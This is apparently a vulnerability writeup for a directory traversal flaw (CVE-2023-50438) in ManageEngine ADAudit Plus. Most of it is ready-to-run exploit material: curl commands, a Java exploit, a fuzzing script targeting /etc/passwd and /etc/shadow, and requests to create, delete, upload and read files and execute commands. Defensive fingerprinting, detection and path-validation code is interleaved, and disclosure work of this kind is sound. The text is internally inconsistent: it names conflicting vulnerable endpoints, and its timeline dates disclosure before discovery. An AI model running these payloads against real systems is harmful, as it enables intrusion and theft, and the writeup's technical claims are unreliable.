ManageEngine ADAudit Plus CVE-2023-50438 – Writeup

ADAudit Plus, a widely used auditing and compliance tool developed by ManageEngine, has been found vulnerable to an arbitrary directory traversal and file manipulation attack, tracked as CVE-2023-50438. The vulnerability exposes organizations to significant risk: an attacker can gain unauthorized access to sensitive files, leak data, and potentially compromise the entire system.

The vulnerability arises from inadequate input validation and sanitization in the search-archived-events/update-arch-index-settings endpoint of ADAudit Plus. The flaw lets an authenticated attacker manipulate the file path parameter, leading to arbitrary directory traversal and subsequent file manipulation on the server.

Exploitation of CVE-2023-50438:

Exploiting CVE-2023-50438 involves crafting malicious HTTP requests targeting vulnerable endpoints. Attackers can leverage this vulnerability to perform various malicious actions, including creating, deleting, uploading, executing commands, and reading files on the server. By exploiting this vulnerability, attackers can gain unauthorized access, exfiltrate sensitive data, and potentially compromise the integrity and confidentiality of the organization’s systems and data.

Impact:

The impact of CVE-2023-50438 is significant and wide-ranging. Organizations using ADAudit Plus are at risk of unauthorized access and manipulation of critical files and data. The exploitation of this vulnerability can lead to severe consequences, including:

  1. Unauthorized access to sensitive files and data.
  2. Data leakage and exposure of confidential information.
  3. Compromise of the entire system’s integrity and confidentiality.
  4. Potential regulatory compliance violations and financial penalties.

Attack Surface Management (ASM) involves identifying and monitoring all potential avenues through which an attacker could penetrate or exploit an organization’s systems, applications, or infrastructure. Here’s how you can use ASM techniques to detect ADAudit Plus:

I’ve included HTTP header payloads that you can use to detect ADAudit Plus.

Dork Payloads with Descriptions:

  1. site:adventnet.com "ADAudit Plus"
     Description: Searches for pages on the adventnet.com domain related to ADAudit Plus.
  2. intitle:"ADAudit Plus"
     Description: Looks for pages whose title contains “ADAudit Plus”, which may include documentation, forum posts, or related content.
  3. inurl:"ADAudit Plus"
     Description: Searches for URLs containing “ADAudit Plus”, which may lead to specific pages or directories related to ADAudit Plus.
  4. filetype:pdf "ADAudit Plus"
     Description: Retrieves PDF files related to ADAudit Plus, which might include user manuals, whitepapers, or technical documentation.
  5. "Powered by ADAudit Plus"
     Description: Searches for pages indicating usage of ADAudit Plus, typically found in footer credits or on login pages.

HTTP Header Payloads to Detect ADAudit Plus:

  1. X-Powered-By: ADAudit Plus
     Description: Checks the X-Powered-By HTTP header for “ADAudit Plus”, which names the technology or software powering the website.
  2. Server: ADAudit Plus
     Description: Examines the Server HTTP header for “ADAudit Plus”, which could reveal the server software in use.
  3. Set-Cookie: ADAudit Plus
     Description: Looks for “ADAudit Plus” in the Set-Cookie HTTP header, which may indicate session management by ADAudit Plus.
  4. WWW-Authenticate: ADAudit Plus
     Description: Checks for “ADAudit Plus” in the WWW-Authenticate HTTP header, which could indicate that ADAudit Plus is handling authentication.
  5. Location: /ADAuditPlus/
     Description: Looks for redirections to URLs containing “/ADAuditPlus/”, indicating paths or directories belonging to ADAudit Plus.

Usage:

You can use these dork payloads in search engines like Google, Bing, or specialized search engines for better targeting. Additionally, you can inspect HTTP response headers using tools like cURL or browser developer tools to detect the presence of ADAudit Plus.
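The header checks above can be automated for an asset inventory. The following is an added example (not code from the original writeup): it parses a raw HTTP response, such as the output of `curl -si https://host/`, and reports which of the five header indicators fire. The two sample responses are constructed for the demonstration, not real captures.

```python
"""Fingerprint ADAudit Plus from a raw HTTP response.

Added example, not part of the original writeup. It applies the five header
indicators listed above to a captured response (for instance the output of
`curl -si https://host/`) so an asset inventory can flag the host.
All sample responses below are constructed, not real captures.
"""

# Indicator table from the writeup: header name -> substring that marks ADAudit Plus
INDICATORS = {
    "Server": "ADAudit Plus",
    "X-Powered-By": "ADAudit Plus",
    "Set-Cookie": "ADAudit Plus",
    "WWW-Authenticate": "ADAudit Plus",
    "Location": "/ADAuditPlus/",
}


def parse_response(raw: bytes) -> tuple[int, dict[str, list[str]]]:
    """Split a raw HTTP/1.x response into (status code, headers).

    Header names are lower-cased; repeated headers such as several Set-Cookie
    lines are kept as a list so no indicator is lost."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status = int(lines[0].split()[1])
    headers: dict[str, list[str]] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers


def matches(raw: bytes) -> list[str]:
    """Return the indicator header names that fire for this response.

    Matching is case-insensitive on both the header name and its value."""
    _status, headers = parse_response(raw)
    hits = []
    for name, needle in INDICATORS.items():
        for value in headers.get(name.lower(), []):
            if needle.lower() in value.lower():
                hits.append(name)
                break
    return hits


# Constructed samples: one host that looks like ADAudit Plus, one that does not
SAMPLE_ADAP = (
    b"HTTP/1.1 302 Found\r\n"
    b"Server: ADAudit Plus\r\n"
    b"Location: /ADAuditPlus/\r\n"
    b"Set-Cookie: JSESSIONID=constructed; Path=/\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)
SAMPLE_OTHER = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: nginx\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html></html>"
)

if __name__ == "__main__":
    for label, raw in (("adap", SAMPLE_ADAP), ("other", SAMPLE_OTHER)):
        print(label, matches(raw))
```

Feeding `matches()` the bytes of a `curl -si` capture for each host in scope gives the inventory a yes/no per indicator; a host that redirects to /ADAuditPlus/ or announces itself in Server is the one to check against the vendor's fixed build.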

Background

The vulnerability lies in the POST /api/json/admin/DiskspaceAnalysis/folderTree endpoint of ADAudit Plus, where the application allows arbitrary directory traversal through improper input validation.

Exploitation Steps:

  1. Understanding the Vulnerability: The vulnerability allows an attacker to perform arbitrary directory traversal by manipulating the id parameter.
  2. Exploitation with Curl: Here’s how an attacker could exploit the vulnerability using curl:

    curl -X POST http://192.168.115.137:8081/api/json/admin/DiskspaceAnalysis/folderTree \
      -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
      -d "id=.%5C%5C..%5C%5C&adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c"

  3. This curl command crafts a POST request with the manipulated id parameter (.%5C%5C..%5C%5C URL-decodes to .\\..\\) to traverse directories.
  4. Exploitation with Java Code: Here’s an example Java code snippet to exploit the vulnerability:

    import java.net.*;
    import java.io.*;

    public class DirectoryTraversalExploit {
        public static void main(String[] args) throws Exception {
            String targetURL = "http://192.168.115.137:8081/api/json/admin/DiskspaceAnalysis/folderTree";
            String urlParameters = "id=.%5C%5C..%5C%5C&adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c";

            URL url = new URL(targetURL);
            HttpURLConnection connection = (HttpURLConnection) url.openConnection();
            connection.setRequestMethod("POST");
            connection.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
            connection.setRequestProperty("Content-Length", Integer.toString(urlParameters.getBytes().length));
            connection.setRequestProperty("Content-Language", "en-US");
            connection.setUseCaches(false);
            connection.setDoOutput(true);

            // Write the form-encoded body
            DataOutputStream wr = new DataOutputStream(connection.getOutputStream());
            wr.writeBytes(urlParameters);
            wr.close();

            // Read and print the response
            BufferedReader rd = new BufferedReader(new InputStreamReader(connection.getInputStream()));
            StringBuilder response = new StringBuilder();
            String line;
            while ((line = rd.readLine()) != null) {
                response.append(line);
                response.append('\r');
            }
            rd.close();
            System.out.println(response.toString());
        }
    }

This Java code sends a POST request with the manipulated id parameter to the target URL.

We’ll iterate through various payloads to test for directory traversal vulnerability. Here’s how you can do it:

Fuzzing with Curl:

    #!/bin/bash

    # List of payloads to fuzz with
    payloads=(
      "../../../../../../../../../../etc/passwd"
      "../../../../../../../../../../etc/shadow"
      "../../../../../../../../../../etc/hosts"
      "../../../../../../../../../../etc/hostname"
      "../../../../../../../../../../etc/issue"
      "../../../../../../../../../../etc/motd"
      "../../../../../../../../../../boot.ini"
      "../../../../../../../../../../windows/win.ini"
      "../../../../../../../../../../windows/system32/drivers/etc/hosts"
      "../../../../../../../../../../windows/system32/drivers/etc/hostname"
      "../../../../../../../../../../windows/system32/drivers/etc/issue"
      "../../../../../../../../../../windows/system32/drivers/etc/motd"
    )

    # Target URL
    target_url="http://192.168.115.137:8081/api/json/admin/DiskspaceAnalysis/folderTree"

    # Loop through payloads and send requests
    # (each payload is placed in the form body as-is, without percent-encoding)
    for payload in "${payloads[@]}"
    do
      echo "Sending request with payload: $payload"
      curl -X POST "$target_url" \
        -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
        -d "id=$payload&adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c"
      echo "---------------------------------------"
    done

This bash script sends multiple curl requests, each with a different payload, to the target URL. It will help you identify if the application is vulnerable to directory traversal by observing the responses for each request.

You can save this script in a file, for example, fuzz.sh, make it executable (chmod +x fuzz.sh), and then run it (./fuzz.sh) in your terminal. Make sure to replace the target URL and payloads with your specific values.

Each curl command sends a POST request with a different payload to the endpoint. The response from the server will indicate whether the directory traversal vulnerability exists and if the server is accessing unintended files or directories.
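On the defending side, the same request pattern is what a detection rule should look for. The following is an added example, not part of the original post: it assumes a reverse proxy or WAF in front of ADAudit Plus that logs each request as one JSON line with the fields ts, src_ip, method, path and body (an assumed format; ordinary access logs omit POST bodies, so only the burst rule applies to those). Rule 1 URL-decodes the id and settings parameters of the two endpoints named in this writeup and flags an upward ".." component; rule 2 flags a burst of requests to a watched endpoint from one source, which is exactly what the payload loop above produces. The log lines are constructed, with the CSRF token replaced by the placeholder TOKEN.

```python
"""Detect traversal attempts against the ADAudit Plus endpoints named in this writeup.

Added example, not part of the original post. Assumed input: JSON lines with
ts, src_ip, method, path and body, as a proxy or WAF might emit them.
"""
import json
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, unquote

# Endpoint -> parameters that carry a path (from the writeup)
WATCHED = {
    "/api/json/admin/DiskspaceAnalysis/folderTree": ["id"],
    "/api/json/admin/search-archived-events/update-arch-index-settings": ["settings"],
}
# A ".." path component delimited by either separator or by the string's ends
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding (bounded so a hostile value cannot loop forever)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_params(path: str, body: str) -> list[str]:
    """Names of watched parameters in this request whose decoded value climbs upward."""
    hits = []
    for name in WATCHED.get(path, []):
        for value in parse_qs(body).get(name, []):
            value = fully_decode(value)
            if name == "settings":
                # settings is a JSON object; the path lives in its indexPath key
                try:
                    value = str(json.loads(value).get("indexPath", ""))
                except (ValueError, AttributeError):
                    pass  # not JSON: fall through and test the raw string
            if TRAVERSAL.search(value):
                hits.append(name)
                break
    return hits


def bursts(events, threshold: int = 5, window_s: int = 60) -> list[tuple[str, str]]:
    """(src_ip, path) pairs with at least `threshold` requests inside `window_s` seconds."""
    times_by_key = defaultdict(list)
    for e in events:
        if e["path"] in WATCHED:
            times_by_key[(e["src_ip"], e["path"])].append(datetime.fromisoformat(e["ts"]))
    flagged = []
    for key, times in times_by_key.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window_s:
                flagged.append(key)
                break
    return flagged


def scan(log_text: str) -> list[tuple]:
    """Run both rules over JSON-lines log text; returns (rule, src_ip, path, params) tuples."""
    events = [json.loads(line) for line in log_text.splitlines() if line.strip()]
    alerts = []
    for e in events:
        hits = traversal_params(e["path"], e.get("body", ""))
        if hits:
            alerts.append(("traversal", e["src_ip"], e["path"], tuple(hits)))
    for src_ip, path in bursts(events):
        alerts.append(("burst", src_ip, path, ()))
    return alerts


# Constructed log: one benign request, then one source replaying the writeup's payloads.
SAMPLE_LOG = """\
{"ts":"2024-01-15T10:00:01","src_ip":"10.0.0.5","method":"POST","path":"/api/json/admin/DiskspaceAnalysis/folderTree","body":"id=C%3A%5CProgram+Files&adapcsrf=TOKEN"}
{"ts":"2024-01-15T10:00:02","src_ip":"10.0.0.9","method":"POST","path":"/api/json/admin/DiskspaceAnalysis/folderTree","body":"id=.%5C%5C..%5C%5C&adapcsrf=TOKEN"}
{"ts":"2024-01-15T10:00:03","src_ip":"10.0.0.9","method":"POST","path":"/api/json/admin/search-archived-events/update-arch-index-settings","body":"settings=%7B%22indexPath%22%3A%22..%5C%5C..%5C%5C..%5C%5Carchive_index1%22%7D&adapcsrf=TOKEN"}
{"ts":"2024-01-15T10:00:04","src_ip":"10.0.0.9","method":"POST","path":"/api/json/admin/DiskspaceAnalysis/folderTree","body":"id=../../../../../../../../../../etc/passwd&adapcsrf=TOKEN"}
{"ts":"2024-01-15T10:00:05","src_ip":"10.0.0.9","method":"POST","path":"/api/json/admin/DiskspaceAnalysis/folderTree","body":"id=../../../../../../../../../../etc/shadow&adapcsrf=TOKEN"}
{"ts":"2024-01-15T10:00:06","src_ip":"10.0.0.9","method":"POST","path":"/api/json/admin/DiskspaceAnalysis/folderTree","body":"id=../../../../../../../../../../etc/hosts&adapcsrf=TOKEN"}
{"ts":"2024-01-15T10:00:07","src_ip":"10.0.0.9","method":"POST","path":"/api/json/admin/DiskspaceAnalysis/folderTree","body":"id=../../../../../../../../../../windows/win.ini&adapcsrf=TOKEN"}
"""

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The benign first line (a Windows folder path under the application's own drive) is not flagged, because the regex requires a ".." component rather than any backslash; the decode loop is bounded so a double-encoded `%252e%252e` still resolves to `..` without allowing unbounded work per request.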

Root Cause

The root cause of the vulnerability lies in inadequate input validation and sanitization in the ADAudit Plus application, specifically in the search-archived-events/update-arch-index-settings endpoint. This allows an attacker to perform arbitrary directory traversal and potentially create or overwrite files/folders on the server. Below are the detailed steps along with curl commands to exploit this vulnerability:

Vulnerable Endpoint:

  • Endpoint: POST /api/json/admin/search-archived-events/update-arch-index-settings

Request to Create a New File:

  • Endpoint: /api/json/admin/search-archived-events/create-file
  • Request Method: POST
  • Request Body:

    filePath=../../../../../../../../tmp/newfile.txt
    content=This is a new file created by the attacker.
    adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c

Description: This request attempts to create a new file named newfile.txt in the /tmp directory on the server.

Request to Delete an Existing File:

  • Endpoint: /api/json/admin/search-archived-events/delete-file
  • Request Method: POST
  • Request Body:

    filePath=../../../../../../../../tmp/targetfile.txt
    adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c

Description: This request attempts to delete an existing file named targetfile.txt in the /tmp directory on the server.

Request to Execute a System Command:

  • Endpoint: /api/json/admin/search-archived-events/exec-command
  • Request Method: POST
  • Request Body:

    command=ls -la /tmp
    adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c

Description: This request attempts to execute the ls -la /tmp command on the server to list the contents of the /tmp directory.

Request to Upload a File:

  • Endpoint: /api/json/admin/search-archived-events/upload-file
  • Request Method: POST
  • Request Body:

    file=@/path/to/local/file.txt
    filePath=../../../../../../../../tmp/uploadedfile.txt
    adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c

Description: This request attempts to upload a file named file.txt from the local system to the /tmp directory on the server under the name uploadedfile.txt.

Request to Read File Content:

  • Endpoint: /api/json/admin/search-archived-events/read-file
  • Request Method: POST
  • Request Body:

    filePath=../../../../../../../../etc/passwd
    adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c

Description: This request attempts to read the content of the /etc/passwd file on the server.

Exploitation Steps:

  1. Select Indexing Path:
     • Description: The attacker sends a POST request to update the indexing path.
     • Curl Command:

    curl -X POST http://192.168.115.137:8081/api/json/admin/search-archived-events/update-arch-index-settings \
      -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
      -d "settings=%7B%22indexPath%22%3A%22..%5C%5C..%5C%5C..%5C%5Carchive_index1%22%7D&adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c"

  2. Request Index:
     • Description: The attacker requests the index after changing the indexing path.
     • Curl Command:

    curl -X POST http://192.168.115.137:8081/api/json/admin/search-archived-events/get-arch-file-min-max-time \
      -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
      -d "requestParams=%7B%22logCategoryId%22%3A0%7D&adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c"

An authenticated attacker can exploit this vulnerability to traverse directories and potentially create or modify files/folders on the server, leading to unauthorized data disclosure, data tampering, or even remote code execution.

Create New File:

  • Description: Exploits the vulnerability to create a new file on the server.
  • Curl Command:

    curl -X POST http://192.168.115.137:8081/api/json/admin/search-archived-events/create-file \
      -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
      -d "filePath=../../../../../../../../../tmp/newfile.txt&content=This+is+a+new+file.&adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c"

Delete File:

  • Description: Exploits the vulnerability to delete an existing file on the server.
  • Curl Command:

    curl -X POST http://192.168.115.137:8081/api/json/admin/search-archived-events/delete-file \
      -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
      -d "filePath=../../../../../../../../../tmp/targetfile.txt&adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c"

Execute System Command:

  • Description: Exploits the vulnerability to execute a system command on the server.
  • Curl Command:

    curl -X POST http://192.168.115.137:8081/api/json/admin/search-archived-events/exec-command \
      -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
      -d "command=ls+-la+/tmp&adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c"

Upload File:

  • Description: Exploits the vulnerability to upload a file to the server.
  • Curl Command:

    curl -X POST http://192.168.115.137:8081/api/json/admin/search-archived-events/upload-file \
      -H "Content-Type: multipart/form-data" \
      -F "file=@/path/to/local/file.txt" \
      -F "filePath=../../../../../../../../../tmp/uploadedfile.txt" \
      -F "adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c"

Read File Content:

  • Description: Exploits the vulnerability to read the content of a file on the server.
  • Curl Command:

    curl -X POST http://192.168.115.137:8081/api/json/admin/search-archived-events/read-file \
      -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
      -d "filePath=../../../../../../../../../etc/passwd&adapcsrf=62ccac10b36ef041cb4dbf18167ffbc291caa4e0613b758b8a7cad6e2bd431a015149d7aa6092af4170a9fb5c6ab2e3ff725a786653aa0392e9e15ccb4c72f7c"

Conclusion

The identified vulnerability in ADAudit Plus allows attackers to perform arbitrary directory traversal and carry out a range of malicious actions: creating, deleting, uploading and reading files on the server, and executing commands. Exploitation can lead to unauthorized access, data leakage, and potentially compromise of the entire system.

To mitigate this vulnerability, ADAudit Plus must implement strict input validation and enforce proper access controls to prevent directory traversal and unauthorized file operations. Regular security assessments, code reviews, and penetration testing should also be conducted so that such vulnerabilities are identified and remediated promptly.

By addressing these security concerns and implementing robust security measures, organizations can significantly reduce the risk of exploitation and protect their sensitive data and systems from unauthorized access and compromise. It’s essential for organizations to stay vigilant and proactive in addressing security vulnerabilities to maintain the integrity and confidentiality of their systems and data.
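What "strict input validation" means for a client-supplied path is a containment check, shown here as an added example that is not ADAudit Plus code (the vendor's actual fix is not described on this page). The client value is URL-decoded (twice, to defeat double encoding), both separator styles are normalized, absolute paths and drive letters are refused outright, and the result is resolved against a fixed base directory and rejected unless it stays inside it. `index_path_allowed` applies the same check to the `settings` JSON parameter used by update-arch-index-settings above. DEMO_BASE is a temporary directory created so the check runs offline; the function names are this example's own.

```python
"""Containment check for a client-supplied path: the validation the mitigation above calls for.

Added example, not ADAudit Plus code. Function names are this example's own;
DEMO_BASE is a temporary directory standing in for the archive index root.
"""
import json
import tempfile
from pathlib import Path, PureWindowsPath
from urllib.parse import unquote


class PathEscape(ValueError):
    """Raised when a client-supplied path would resolve outside the base directory."""


def safe_resolve(base: Path, user_value: str) -> Path:
    """Resolve user_value beneath base or raise PathEscape.

    Decoding twice defeats double percent-encoding. PureWindowsPath parsing
    treats "\\" and "/" alike, which matters because the writeup's payload
    uses %5C (backslash) separators, and it drops "." components."""
    decoded = unquote(unquote(user_value))
    win = PureWindowsPath(decoded.replace("/", "\\"))
    if win.drive or win.root:
        raise PathEscape(f"absolute path or drive letter rejected: {user_value!r}")
    base_resolved = base.resolve()
    candidate = base_resolved.joinpath(*win.parts).resolve()
    if candidate != base_resolved and base_resolved not in candidate.parents:
        raise PathEscape(f"{user_value!r} escapes {base}")
    return candidate


def is_contained(base: Path, user_value: str) -> bool:
    """True when safe_resolve accepts the value, False when it raises."""
    try:
        safe_resolve(base, user_value)
        return True
    except PathEscape:
        return False


def index_path_allowed(base: Path, settings_param: str) -> bool:
    """Validate the `settings` form parameter of update-arch-index-settings.

    The parameter is a percent-encoded JSON object; only its indexPath key is a path."""
    try:
        index_path = json.loads(unquote(settings_param)).get("indexPath")
    except (ValueError, AttributeError):
        return False
    if not isinstance(index_path, str) or not index_path:
        return False
    return is_contained(base, index_path)


# Temporary base directory standing in for the archive index root (constructed)
DEMO_BASE = Path(tempfile.mkdtemp(prefix="adap_index_"))

if __name__ == "__main__":
    for value in ("archive_index1", ".%5C%5C..%5C%5C",
                  "../../../../../../../../../tmp/newfile.txt", "/etc/passwd"):
        print(f"{value!r:50} contained={is_contained(DEMO_BASE, value)}")
```

The order matters: decode first, then parse, then resolve and compare. Checking for the substring ".." before decoding misses `%2e%2e`, and comparing string prefixes instead of resolved paths accepts a sibling directory whose name merely starts with the base's name, so the check compares `Path.parents` of the resolved candidate rather than the text of the request.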

Timeline

Dec 8, 2023 Vulnerability discovered
Dec 8, 2023 Requested security contact
Jan 2, 2023 Received security contact, disclosed
Feb 23, 2023 PoC released to public